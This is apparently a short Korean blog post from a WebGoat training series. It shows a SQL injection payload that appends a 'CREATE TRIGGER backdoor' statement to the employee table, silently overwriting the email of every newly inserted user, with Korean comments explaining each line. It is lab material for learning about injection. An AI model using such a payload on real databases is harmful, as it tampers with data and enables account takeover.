101; CREATE TRIGGER backdoor //bacdoor를 create하는데
BEFORE INSERT on employee //insert 되기전에
FOR EACH ROW BEGIN //각 row의 시작에 ㄷㅐ해
UPDATE employee SET email='abc@naver.com' //employee필드의 email을 ~로바꿈
WHERE userid=NEW.userid; //새 유저 아이디의 email
'war game > webgoat' 카테고리의 다른 글
webgoat numeric sql injection (0) | 2016.11.13 |
---|---|
webgoat sql injection stage1 (0) | 2016.11.13 |